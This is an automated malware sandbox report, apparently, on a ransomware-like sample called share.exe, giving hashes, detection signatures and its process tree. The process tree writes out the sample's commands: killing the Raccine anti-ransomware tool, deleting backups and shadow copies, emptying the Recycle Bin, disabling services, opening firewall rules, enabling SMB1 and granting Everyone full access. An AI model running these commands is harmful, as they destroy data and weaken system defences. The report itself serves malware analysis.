Analysis
-
max time kernel
137s -
max time network
166s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
04/06/2021, 16:17
Static task
static1
Behavioral task
behavioral1
Sample
share.exe
Resource
win7v20210408
0 signatures
0 seconds
General
-
Target
share.exe
-
Size
170KB
-
MD5
108d4532a263fca754b85d942bd55451
-
SHA1
202a1bf5238322372d1da89850a61c4c050a9edd
-
SHA256
b010e408ad75f379646832fa83567596c7918be1a54b80fc2b4207c33e57057d
-
SHA512
72735b3c1c03f7cf0462e59d231bddc8490f26a47690b5ca408313a633f9570d9aa140194439ec997d2e5638eae350bb1b9095857d9bd467e8488efbdd27638a
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 3 IoCs
pid Process 2868 icacls.exe 2860 icacls.exe 2884 icacls.exe -
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: mountvol.exe File opened (read-only) \??\B: mountvol.exe File opened (read-only) \??\E: mountvol.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2384 1720 WerFault.exe 25 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 3028 net.exe -
Kills process with taskkill 2 IoCs
pid Process 996 taskkill.exe 1876 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1340 powershell.exe 1340 powershell.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe 1720 share.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 1720 share.exe Token: SeDebugPrivilege 1876 taskkill.exe Token: SeDebugPrivilege 996 taskkill.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeBackupPrivilege 1212 vssvc.exe Token: SeRestorePrivilege 1212 vssvc.exe Token: SeAuditPrivilege 1212 vssvc.exe Token: SeIncreaseQuotaPrivilege 1340 powershell.exe Token: SeSecurityPrivilege 1340 powershell.exe Token: SeTakeOwnershipPrivilege 1340 powershell.exe Token: SeLoadDriverPrivilege 1340 powershell.exe Token: SeSystemProfilePrivilege 1340 powershell.exe Token: SeSystemtimePrivilege 1340 powershell.exe Token: SeProfSingleProcessPrivilege 1340 powershell.exe Token: SeIncBasePriorityPrivilege 1340 powershell.exe Token: SeCreatePagefilePrivilege 1340 powershell.exe Token: SeBackupPrivilege 1340 powershell.exe Token: SeRestorePrivilege 1340 powershell.exe Token: SeShutdownPrivilege 1340 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeSystemEnvironmentPrivilege 1340 powershell.exe Token: SeRemoteShutdownPrivilege 1340 powershell.exe Token: SeUndockPrivilege 1340 powershell.exe Token: SeManageVolumePrivilege 1340 powershell.exe Token: 33 1340 powershell.exe Token: 34 1340 powershell.exe Token: 35 1340 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 2384 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1720 wrote to memory of 1268 1720 share.exe 31 PID 1720 wrote to memory of 1268 1720 share.exe 31 PID 1720 wrote to memory of 1268 1720 share.exe 31 PID 1720 wrote to memory of 1268 1720 share.exe 31 PID 1268 wrote to memory of 1392 1268 csc.exe 32 PID 1268 wrote to memory of 1392 1268 csc.exe 32 PID 1268 wrote to memory of 1392 1268 csc.exe 32 PID 1268 wrote to memory of 1392 1268 csc.exe 32 PID 1720 wrote to memory of 996 1720 share.exe 34 PID 1720 wrote to memory of 996 1720 share.exe 34 PID 1720 wrote to memory of 996 1720 share.exe 34 PID 1720 wrote to memory of 996 1720 share.exe 34 PID 1720 wrote to memory of 1876 1720 share.exe 36 PID 1720 wrote to memory of 1876 1720 share.exe 36 PID 1720 wrote to memory of 1876 1720 share.exe 36 PID 1720 wrote to memory of 1876 1720 share.exe 36 PID 1720 wrote to memory of 1620 1720 share.exe 38 PID 1720 wrote to memory of 1620 1720 share.exe 38 PID 1720 wrote to memory of 1620 1720 share.exe 38 PID 1720 wrote to memory of 1620 1720 share.exe 38 PID 1720 wrote to memory of 292 1720 share.exe 40 PID 1720 wrote to memory of 292 1720 share.exe 40 PID 1720 wrote to memory of 292 1720 share.exe 40 PID 1720 wrote to memory of 292 1720 share.exe 40 PID 1720 wrote to memory of 1988 1720 share.exe 44 PID 1720 wrote to memory of 1988 1720 share.exe 44 PID 1720 wrote to memory of 1988 1720 share.exe 44 PID 1720 wrote to memory of 1988 1720 share.exe 44 PID 1720 wrote to memory of 1388 1720 share.exe 43 PID 1720 wrote to memory of 1388 1720 share.exe 43 PID 1720 wrote to memory of 1388 1720 share.exe 43 PID 1720 wrote to memory of 1388 1720 share.exe 43 PID 1720 wrote to memory of 1760 1720 share.exe 42 PID 1720 wrote to memory of 1760 1720 share.exe 42 PID 1720 wrote to memory of 1760 1720 share.exe 42 PID 1720 wrote to memory of 1760 1720 share.exe 42 PID 1720 wrote to memory of 1976 1720 share.exe 45 PID 1720 wrote to memory of 1976 1720 share.exe 45 PID 1720 wrote to memory of 1976 1720 share.exe 45 PID 1720 wrote to memory of 1976 1720 share.exe 45 PID 1720 wrote to memory of 772 1720 share.exe 48 PID 1720 wrote to memory of 772 1720 share.exe 48 PID 1720 wrote to memory of 772 1720 share.exe 48 PID 1720 wrote to memory of 772 1720 share.exe 48 PID 1720 wrote to memory of 932 1720 share.exe 49 PID 1720 wrote to memory of 932 1720 share.exe 49 PID 1720 wrote to memory of 932 1720 share.exe 49 PID 1720 wrote to memory of 932 1720 share.exe 49 PID 1720 wrote to memory of 1772 1720 share.exe 53 PID 1720 wrote to memory of 1776 1720 share.exe 52 PID 1720 wrote to memory of 1776 1720 share.exe 52 PID 1720 wrote to memory of 1772 1720 share.exe 53 PID 1720 wrote to memory of 1776 1720 share.exe 52 PID 1720 wrote to memory of 1772 1720 share.exe 53 PID 1720 wrote to memory of 1776 1720 share.exe 52 PID 1720 wrote to memory of 1772 1720 share.exe 53 PID 1720 wrote to memory of 1256 1720 share.exe 54 PID 1720 wrote to memory of 1256 1720 share.exe 54 PID 1720 wrote to memory of 1256 1720 share.exe 54 PID 1720 wrote to memory of 1256 1720 share.exe 54 PID 1720 wrote to memory of 1356 1720 share.exe 55 PID 1720 wrote to memory of 1356 1720 share.exe 55 PID 1720 wrote to memory of 1356 1720 share.exe 55 PID 1720 wrote to memory of 1356 1720 share.exe 55 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" share.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" share.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\share.exe"C:\Users\Admin\AppData\Local\Temp\share.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BCB.tmp" "c:\Users\Admin\AppData\Local\Temp\uuzg5401\CSC3B3AE650BD234159967F7DA4C12CC3C3.TMP"3⤵PID:1392
-
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1620
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled2⤵PID:292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk2⤵PID:1760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk2⤵PID:1388
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk2⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk2⤵PID:772
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLWriter start= disabled2⤵PID:932
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SstpSvc start= disabled2⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk2⤵PID:1772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk2⤵PID:1256
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config MBAMService start= disabled2⤵PID:1356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:1784
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config Dnscache start= auto2⤵PID:2092
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config FDResPub start= auto2⤵PID:2104
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config upnphost start= auto2⤵PID:2116
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config fdPHost start= auto2⤵PID:2184
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SSDPSRV start= auto2⤵PID:2176
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵PID:2516
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:2580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\mountvol.exe"mountvol.exe"2⤵PID:2672
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" A: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\2⤵
- Enumerates connected drives
PID:2720
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" B: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\2⤵
- Enumerates connected drives
PID:2768
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" E: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\2⤵
- Enumerates connected drives
PID:2784
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2868
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2860
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2884
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:2944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" view2⤵
- Discovers systems in the same network
PID:3028
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" use \\10.7.0.392⤵PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 15442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1212